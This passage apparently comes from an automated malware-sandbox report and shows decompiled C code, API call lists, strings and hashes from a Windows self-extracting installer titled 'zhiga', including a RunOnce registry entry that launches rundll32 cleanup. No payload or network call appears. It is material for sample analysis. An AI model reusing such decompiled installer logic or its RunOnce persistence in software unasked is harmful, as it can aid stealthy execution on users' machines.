                                                          • LocalAlloc.KERNEL32(00000040,00000065), ref: 010C45A3
                                                          • LocalAlloc.KERNEL32(00000040,00000065), ref: 010C45E3
                                                          • LocalAlloc.KERNEL32(00000040,00000002), ref: 010C460D
                                                          • MessageBeep.USER32(00000000), ref: 010C4630
                                                          • MessageBoxA.USER32(?,00000000,zhiga,00000000), ref: 010C4666
                                                          • LocalFree.KERNEL32(00000000), ref: 010C466F
                                                            • Part of subcall function 010C681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 010C686E
                                                            • Part of subcall function 010C681F: GetSystemMetrics.USER32(0000004A), ref: 010C68A7
                                                            • Part of subcall function 010C681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 010C68CC
                                                            • Part of subcall function 010C681F: RegQueryValueExA.ADVAPI32(?,010C1140,00000000,?,?,0000000C), ref: 010C68F4
                                                            • Part of subcall function 010C681F: RegCloseKey.ADVAPI32(?), ref: 010C6902
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                          • String ID: LoadString() Error. Could not load string resource.$zhiga
                                                          • API String ID: 3244514340-1120439489
                                                          • Opcode ID: 0edcb03664e2dbd66fe121bb0c7ccd59ca06e9c56e9c9d7248917543a0c6e117
                                                          • Instruction ID: 71c8b1bc04aee1f28b784acdf60237b9c138d4d93e2826e59d42631bfe298c7b
                                                          • Opcode Fuzzy Hash: 0edcb03664e2dbd66fe121bb0c7ccd59ca06e9c56e9c9d7248917543a0c6e117
                                                          • Instruction Fuzzy Hash: D951D371A00219AFDB219F28CC58BAE7BA9FF85B04F104198ED89E7246DB36D9058F50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 94%
                                                          			E010C2773(CHAR* __ecx, char* _a4) {
                                                          				signed int _v8;
                                                          				char _v268;
                                                          				char _v269;
                                                          				CHAR* _v276;
                                                          				int _v280;
                                                          				void* _v284;
                                                          				int _v288;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t23;
                                                          				intOrPtr _t34;
                                                          				int _t45;
                                                          				int* _t50;
                                                          				CHAR* _t52;
                                                          				CHAR* _t61;
                                                          				char* _t62;
                                                          				int _t63;
                                                          				CHAR* _t64;
                                                          				signed int _t65;
                                                          
                                                          				_t52 = __ecx;
                                                          				_t23 =  *0x10c8004; // 0x4b13cf70
                                                          				_v8 = _t23 ^ _t65;
                                                          				_t62 = _a4;
                                                          				_t50 = 0;
                                                          				_t61 = __ecx;
                                                          				_v276 = _t62;
                                                          				 *((char*)(__ecx)) = 0;
                                                          				if( *_t62 != 0x23) {
                                                          					_t63 = 0x104;
                                                          					goto L14;
                                                          				} else {
                                                          					_t64 = _t62 + 1;
                                                          					_v269 = CharUpperA( *_t64);
                                                          					_v276 = CharNextA(CharNextA(_t64));
                                                          					_t63 = 0x104;
                                                          					_t34 = _v269;
                                                          					if(_t34 == 0x53) {
                                                          						L14:
                                                          						GetSystemDirectoryA(_t61, _t63);
                                                          						goto L15;
                                                          					} else {
                                                          						if(_t34 == 0x57) {
                                                          							GetWindowsDirectoryA(_t61, 0x104);
                                                          							goto L16;
                                                          						} else {
                                                          							_push(_t52);
                                                          							_v288 = 0x104;
                                                          							E010C1781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                          							_t59 = 0x104;
                                                          							E010C658A( &_v268, 0x104, _v276);
                                                          							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                          								L16:
                                                          								_t59 = _t63;
                                                          								E010C658A(_t61, _t63, _v276);
                                                          							} else {
                                                          								if(RegQueryValueExA(_v284, 0x10c1140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                          									_t45 = _v280;
                                                          									if(_t45 != 2) {
                                                          										L9:
                                                          										if(_t45 == 1) {
                                                          											goto L10;
                                                          										}
                                                          									} else {
                                                          										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                          											_t45 = _v280;
                                                          											goto L9;
                                                          										} else {
                                                          											_t59 = 0x104;
                                                          											E010C1680(_t61, 0x104,  &_v268);
                                                          											L10:
                                                          											_t50 = 1;
                                                          										}
                                                          									}
                                                          								}
                                                          								RegCloseKey(_v284);
                                                          								L15:
                                                          								if(_t50 == 0) {
                                                          									goto L16;
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				return E010C6CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                          			}























                                                          0x010c2773
                                                          0x010c277e
                                                          0x010c2785
                                                          0x010c278a
                                                          0x010c278d
                                                          0x010c2790
                                                          0x010c2792
                                                          0x010c2798
                                                          0x010c279d
                                                          0x010c28b2
                                                          0x00000000
                                                          0x010c27a3
                                                          0x010c27a3
                                                          0x010c27af
                                                          0x010c27c2
                                                          0x010c27c8
                                                          0x010c27cd
                                                          0x010c27d5
                                                          0x010c28b7
                                                          0x010c28b9
                                                          0x00000000
                                                          0x010c27db
                                                          0x010c27dd
                                                          0x010c28aa
                                                          0x00000000
                                                          0x010c27e3
                                                          0x010c27e3
                                                          0x010c27ec
                                                          0x010c27f8
                                                          0x010c2803
                                                          0x010c280b
                                                          0x010c2831
                                                          0x010c28c3
                                                          0x010c28c9
                                                          0x010c28cd
                                                          0x010c2837
                                                          0x010c285a
                                                          0x010c285c
                                                          0x010c2865
                                                          0x010c2892
                                                          0x010c2895
                                                          0x00000000
                                                          0x00000000
                                                          0x010c2867
                                                          0x010c2878
                                                          0x010c288c
                                                          0x00000000
                                                          0x010c287a
                                                          0x010c2880
                                                          0x010c2885
                                                          0x010c2897
                                                          0x010c2899
                                                          0x010c2899
                                                          0x010c2878
                                                          0x010c2865
                                                          0x010c28a0
                                                          0x010c28bf
                                                          0x010c28c1
                                                          0x00000000
                                                          0x00000000
                                                          0x010c28c1
                                                          0x010c2831
                                                          0x010c27dd
                                                          0x010c27d5
                                                          0x010c28e5

                                                          APIs
                                                          • CharUpperA.USER32(4B13CF70,00000000,00000000,00000000), ref: 010C27A8
                                                          • CharNextA.USER32(0000054D), ref: 010C27B5
                                                          • CharNextA.USER32(00000000), ref: 010C27BC
                                                          • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010C2829
                                                          • RegQueryValueExA.ADVAPI32(?,010C1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010C2852
                                                          • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010C2870
                                                          • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010C28A0
                                                          • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 010C28AA
                                                          • GetSystemDirectoryA.KERNEL32 ref: 010C28B9
                                                          Strings
                                                          • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 010C27E4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                          • API String ID: 2659952014-2428544900
                                                          • Opcode ID: 57a6b5c14c2eee8f615ce15fa0699c2c21df259608e3b7842aeb78b5223d6010
                                                          • Instruction ID: f76921dfe7c6df3c84677afff6be48958066c27255deff9bf92a2d4f21fa31b9
                                                          • Opcode Fuzzy Hash: 57a6b5c14c2eee8f615ce15fa0699c2c21df259608e3b7842aeb78b5223d6010
                                                          • Instruction Fuzzy Hash: 9A41AE70A0112CAFDB259B649C84AFE7BBDEB55B40F1040EDFAC9D2105DB758E858FA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 62%
                                                          			E010C2267() {
                                                          				signed int _v8;
                                                          				char _v268;
                                                          				char _v836;
                                                          				void* _v840;
                                                          				int _v844;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t19;
                                                          				intOrPtr _t33;
                                                          				void* _t38;
                                                          				intOrPtr* _t42;
                                                          				void* _t45;
                                                          				void* _t47;
                                                          				void* _t49;
                                                          				signed int _t51;
                                                          
                                                          				_t19 =  *0x10c8004; // 0x4b13cf70
                                                          				_t20 = _t19 ^ _t51;
                                                          				_v8 = _t19 ^ _t51;
                                                          				if( *0x10c8530 != 0) {
                                                          					_push(_t49);
                                                          					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                          						_push(_t38);
                                                          						_v844 = 0x238;
                                                          						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                          							_push(_t47);
                                                          							memset( &_v268, 0, 0x104);
                                                          							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                          								E010C658A( &_v268, 0x104, 0x10c1140);
                                                          							}
                                                          							_push("C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\");
                                                          							E010C171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                          							_t42 =  &_v836;
                                                          							_t45 = _t42 + 1;
                                                          							_pop(_t47);
                                                          							do {
                                                          								_t33 =  *_t42;
                                                          								_t42 = _t42 + 1;
                                                          							} while (_t33 != 0);
                                                          							RegSetValueExA(_v840, "wextract_cleanup0", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                          						}
                                                          						_t20 = RegCloseKey(_v840);
                                                          						_pop(_t38);
                                                          					}
                                                          					_pop(_t49);
                                                          				}
                                                          				return E010C6CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                          			}



















                                                          0x010c2272
                                                          0x010c2277
                                                          0x010c2279
                                                          0x010c2283
                                                          0x010c2289
                                                          0x010c22ab
                                                          0x010c22b1
                                                          0x010c22c4
                                                          0x010c22e0
                                                          0x010c22e6
                                                          0x010c22f5
                                                          0x010c230d
                                                          0x010c231c
                                                          0x010c231c
                                                          0x010c2321
                                                          0x010c233a
                                                          0x010c2342
                                                          0x010c2348
                                                          0x010c234b
                                                          0x010c234c
                                                          0x010c234c
                                                          0x010c234e
                                                          0x010c234f
                                                          0x010c236e
                                                          0x010c236e
                                                          0x010c237a
                                                          0x010c2380
                                                          0x010c2380
                                                          0x010c2381
                                                          0x010c2381
                                                          0x010c238f

                                                          APIs
                                                          • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 010C22A3
                                                          • RegQueryValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000000,?,?,00000001), ref: 010C22D8
                                                          • memset.MSVCRT ref: 010C22F5
                                                          • GetSystemDirectoryA.KERNEL32 ref: 010C2305
                                                          • RegSetValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 010C236E
                                                          • RegCloseKey.ADVAPI32(?), ref: 010C237A
                                                          Strings
                                                          • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 010C232D
                                                          • wextract_cleanup0, xrefs: 010C227C, 010C22CD, 010C2363
                                                          • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 010C2321
                                                          • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 010C2299
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
                                                          • API String ID: 3027380567-2874043782
                                                          • Opcode ID: 6d4a2529baab796585a5a9d565745935f2d5fe4f5411ec825ac9d245abfdebd9
                                                          • Instruction ID: c43fe64056461e5c3bf64ea3bdf6d6d7c4d6db2eee7ad56877f91e6c8c026349
                                                          • Opcode Fuzzy Hash: 6d4a2529baab796585a5a9d565745935f2d5fe4f5411ec825ac9d245abfdebd9
                                                          • Instruction Fuzzy Hash: 6031C571A00218ABDB719B55DC49FEE7B7CEB54B40F1001EEB98DAA001EA75AB84CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 87%
                                                          			E010C3100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                          				void* _t8;
                                                          				void* _t11;
                                                          				void* _t15;
                                                          				struct HWND__* _t16;
                                                          				struct HWND__* _t33;
                                                          				struct HWND__* _t34;
                                                          
                                                          				_t8 = _a8 - 0xf;
                                                          				if(_t8 == 0) {
                                                          					if( *0x10c8590 == 0) {
                                                          						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                          						 *0x10c8590 = 1;
                                                          					}
                                                          					L13:
                                                          					return 0;
                                                          				}
                                                          				_t11 = _t8 - 1;
                                                          				if(_t11 == 0) {
                                                          					L7:
                                                          					_push(0);
                                                          					L8:
                                                          					EndDialog(_a4, ??);
                                                          					L9:
                                                          					return 1;
                                                          				}
                                                          				_t15 = _t11 - 0x100;
                                                          				if(_t15 == 0) {
                                                          					_t16 = GetDesktopWindow();
                                                          					_t33 = _a4;
                                                          					E010C43D0(_t33, _t16);
                                                          					SetDlgItemTextA(_t33, 0x834,  *0x10c8d4c);
                                                          					SetWindowTextA(_t33, "zhiga");
                                                          					SetForegroundWindow(_t33);
                                                          					_t34 = GetDlgItem(_t33, 0x834);
                                                          					 *0x10c88b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                          					SetWindowLongA(_t34, 0xfffffffc, E010C30C0);
                                                          					return 1;
                                                          				}
                                                          				if(_t15 != 1) {
                                                          					goto L13;
                                                          				}
                                                          				if(_a12 != 6) {
                                                          					if(_a12 != 7) {
                                                          						goto L9;
                                                          					}
                                                          					goto L7;
                                                          				}
                                                          				_push(1);
                                                          				goto L8;
                                                          			}









                                                          0x010c3108
                                                          0x010c310b
                                                          0x010c31b7
                                                          0x010c31ca
                                                          0x010c31d0
                                                          0x010c31d0
                                                          0x010c31da
                                                          0x00000000
                                                          0x010c31da
                                                          0x010c3111
                                                          0x010c3114
                                                          0x010c3136
                                                          0x010c3136
                                                          0x010c3138
                                                          0x010c313b
                                                          0x010c3141
                                                          0x00000000
                                                          0x010c3143
                                                          0x010c3116
                                                          0x010c311b
                                                          0x010c314b
                                                          0x010c3151
                                                          0x010c3158
                                                          0x010c316a
                                                          0x010c3176
                                                          0x010c317d
                                                          0x010c318b
                                                          0x010c319e
                                                          0x010c31a3
                                                          0x00000000
                                                          0x010c31ad
                                                          0x010c3120
                                                          0x00000000
                                                          0x00000000
                                                          0x010c312a
                                                          0x010c3134
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x010c3134
                                                          0x010c312c
                                                          0x00000000

                                                          APIs
                                                          • EndDialog.USER32(?,00000000), ref: 010C313B
                                                          • GetDesktopWindow.USER32 ref: 010C314B
                                                          • SetDlgItemTextA.USER32(?,00000834), ref: 010C316A
                                                          • SetWindowTextA.USER32(?,zhiga), ref: 010C3176
                                                          • SetForegroundWindow.USER32(?), ref: 010C317D
                                                          • GetDlgItem.USER32(?,00000834), ref: 010C3185
                                                          • GetWindowLongA.USER32(00000000,000000FC), ref: 010C3190
                                                          • SetWindowLongA.USER32(00000000,000000FC,010C30C0), ref: 010C31A3
                                                          • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 010C31CA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                          • String ID: zhiga
                                                          • API String ID: 3785188418-3705506974
                                                          • Opcode ID: 6972b48765a7b58802c8981fe88d62e7d91582a4952b4264ea87cd7d3fcb292d
                                                          • Instruction ID: 9fdf0c49d9d11bcf25b26fb7031cff125070acd373f29a603c8b1ffe570b3b3c
                                                          • Opcode Fuzzy Hash: 6972b48765a7b58802c8981fe88d62e7d91582a4952b4264ea87cd7d3fcb292d
                                                          • Instruction Fuzzy Hash: FA11D531214125FFDB225B28AC0CB9E3AB4FBC6B20F008219FDD19A184E77A8541CF44
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 82%
                                                          			E010C468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                          				long _t4;
                                                          				void* _t11;
                                                          				CHAR* _t14;
                                                          				void* _t15;
                                                          				long _t16;
                                                          
                                                          				_t14 = __ecx;
                                                          				_t11 = __edx;
                                                          				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                          				_t16 = _t4;
                                                          				if(_t16 <= _a4 && _t11 != 0) {
                                                          					if(_t16 == 0) {
                                                          						L5:
                                                          						return 0;
                                                          					}
                                                          					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                          					if(_t15 == 0) {
                                                          						goto L5;
                                                          					}
                                                          					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                          					FreeResource(_t15);
                                                          					return _t16;
                                                          				}
                                                          				return _t4;
                                                          			}








                                                          0x010c4699
                                                          0x010c469b
                                                          0x010c46a9
                                                          0x010c46af
                                                          0x010c46b4
                                                          0x010c46bc
                                                          0x010c46f9
                                                          0x00000000
                                                          0x010c46f9
                                                          0x010c46d9
                                                          0x010c46dd
                                                          0x00000000
                                                          0x00000000
                                                          0x010c46e5
                                                          0x010c46ef
                                                          0x00000000
                                                          0x010c46f5
                                                          0x010c46ff

                                                          APIs
                                                          • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010C46A0
                                                          • SizeofResource.KERNEL32(00000000,00000000,?,010C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46A9
                                                          • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010C46C3
                                                          • LoadResource.KERNEL32(00000000,00000000,?,010C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46CC
                                                          • LockResource.KERNEL32(00000000,?,010C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46D3
                                                          • memcpy_s.MSVCRT ref: 010C46E5
                                                          • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46EF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                          • String ID: TITLE$zhiga
                                                          • API String ID: 3370778649-3314309
                                                          • Opcode ID: 8b41ef66d96bb68a1662b0f0601a75b7e2db829fd1f60649658a647760f5d889
                                                          • Instruction ID: d7995348ab2d986230da7601fea9ff7f838ab5459e8119677a7bdd16535adfc2
                                                          • Opcode Fuzzy Hash: 8b41ef66d96bb68a1662b0f0601a75b7e2db829fd1f60649658a647760f5d889
                                                          • Instruction Fuzzy Hash: 07014F36344214BFF36017A96C4DF6B7E68EBC9FA1F140018FBCAD7148D96688458BA6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 57%
                                                          			E010C17EE(intOrPtr* __ecx) {
                                                          				signed int _v8;
                                                          				short _v12;
                                                          				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                          				_Unknown_base(*)()* _v20;
                                                          				void* _v24;
                                                          				intOrPtr* _v28;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t14;
                                                          				_Unknown_base(*)()* _t20;
                                                          				long _t28;
                                                          				void* _t35;
                                                          				struct HINSTANCE__* _t36;
                                                          				signed int _t38;
                                                          				intOrPtr* _t39;
                                                          
                                                          				_t14 =  *0x10c8004; // 0x4b13cf70
                                                          				_v8 = _t14 ^ _t38;
                                                          				_v12 = 0x500;
                                                          				_t37 = __ecx;
                                                          				_v16.Value = 0;
                                                          				_v28 = __ecx;
                                                          				_t28 = 0;
                                                          				_t36 = LoadLibraryA("advapi32.dll");
                                                          				if(_t36 != 0) {
                                                          					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                          					_v20 = _t20;
                                                          					if(_t20 != 0) {
                                                          						 *_t37 = 0;
                                                          						_t28 = 1;
                                                          						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                          							_t37 = _t39;
                                                          							 *0x10ca288(0, _v24, _v28);
                                                          							_v20();
                                                          							if(_t39 != _t39) {
                                                          								asm("int 0x29");
                                                          							}
                                                          							FreeSid(_v24);
                                                          						}
                                                          					}
                                                          					FreeLibrary(_t36);
                                                          				}
                                                          				return E010C6CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                          			}



















                                                          0x010c17f6
                                                          0x010c17fd
                                                          0x010c1805
                                                          0x010c180b
                                                          0x010c180d
                                                          0x010c1815
                                                          0x010c1818
                                                          0x010c1820
                                                          0x010c1824
                                                          0x010c182c
                                                          0x010c1832
                                                          0x010c1837
                                                          0x010c1851
                                                          0x010c1854
                                                          0x010c185d
                                                          0x010c1862
                                                          0x010c186c
                                                          0x010c1872
                                                          0x010c1877
                                                          0x010c187e
                                                          0x010c187e
                                                          0x010c1883
                                                          0x010c1883
                                                          0x010c185d
                                                          0x010c188a
                                                          0x010c188a
                                                          0x010c18a2

                                                          APIs
                                                          • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,010C18DD), ref: 010C181A
                                                          • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 010C182C
                                                          • AllocateAndInitializeSid.ADVAPI32(010C18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,010C18DD), ref: 010C1855
                                                          • FreeSid.ADVAPI32(?,?,?,?,010C18DD), ref: 010C1883
                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,010C18DD), ref: 010C188A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                          • String ID: CheckTokenMembership$advapi32.dll
                                                          • API String ID: 4204503880-1888249752
                                                          • Opcode ID: 536a70b2de405598872d0e24b7cb2f34f81eb61e5c6414ff78d4c05045e6dd08
                                                          • Instruction ID: 8015ca6d0ceb09a1f3806454058b913ac613f8e3e027cc076194718f36513687
                                                          • Opcode Fuzzy Hash: 536a70b2de405598872d0e24b7cb2f34f81eb61e5c6414ff78d4c05045e6dd08
                                                          • Instruction Fuzzy Hash: 5C115471F00209EFEB109FA5DC49ABFBBB8EB44B41F10016DFA45E7281EA7599048F91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E010C3450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                          				void* _t7;
                                                          				void* _t11;
                                                          				struct HWND__* _t12;
                                                          				int _t22;
                                                          				struct HWND__* _t24;
                                                          
                                                          				_t7 = _a8 - 0x10;
                                                          				if(_t7 == 0) {
                                                          					EndDialog(_a4, 2);
                                                          					L11:
                                                          					return 1;
                                                          				}
                                                          				_t11 = _t7 - 0x100;
                                                          				if(_t11 == 0) {
                                                          					_t12 = GetDesktopWindow();
                                                          					_t24 = _a4;
                                                          					E010C43D0(_t24, _t12);
                                                          					SetWindowTextA(_t24, "zhiga");
                                                          					SetDlgItemTextA(_t24, 0x838,  *0x10c9404);
                                                          					SetForegroundWindow(_t24);
                                                          					goto L11;
                                                          				}
                                                          				if(_t11 == 1) {
                                                          					_t22 = _a12;
                                                          					if(_t22 < 6) {
                                                          						goto L11;
                                                          					}
                                                          					if(_t22 <= 7) {
                                                          						L8:
                                                          						EndDialog(_a4, _t22);
                                                          						return 1;
                                                          					}
                                                          					if(_t22 != 0x839) {
                                                          						goto L11;
                                                          					}
                                                          					 *0x10c91dc = 1;
                                                          					goto L8;
                                                          				}
                                                          				return 0;
                                                          			}








                                                          0x010c3459
                                                          0x010c345c
                                                          0x010c34d8
                                                          0x010c34de
                                                          0x00000000
                                                          0x010c34e0
                                                          0x010c345e
                                                          0x010c3463
                                                          0x010c349a
                                                          0x010c34a0
                                                          0x010c34a7
                                                          0x010c34b2
                                                          0x010c34c4
                                                          0x010c34cb
                                                          0x00000000
                                                          0x010c34cb
                                                          0x010c3468
                                                          0x010c346e
                                                          0x010c3474
                                                          0x00000000
                                                          0x00000000
                                                          0x010c347c
                                                          0x010c348c
                                                          0x010c3490
                                                          0x00000000
                                                          0x010c3496
                                                          0x010c3484
                                                          0x00000000
                                                          0x00000000
                                                          0x010c3486
                                                          0x00000000
                                                          0x010c3486
                                                          0x00000000

                                                          APIs
                                                          • EndDialog.USER32(?,?), ref: 010C3490
                                                          • GetDesktopWindow.USER32 ref: 010C349A
                                                          • SetWindowTextA.USER32(?,zhiga), ref: 010C34B2
                                                          • SetDlgItemTextA.USER32(?,00000838), ref: 010C34C4
                                                          • SetForegroundWindow.USER32(?), ref: 010C34CB
                                                          • EndDialog.USER32(?,00000002), ref: 010C34D8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
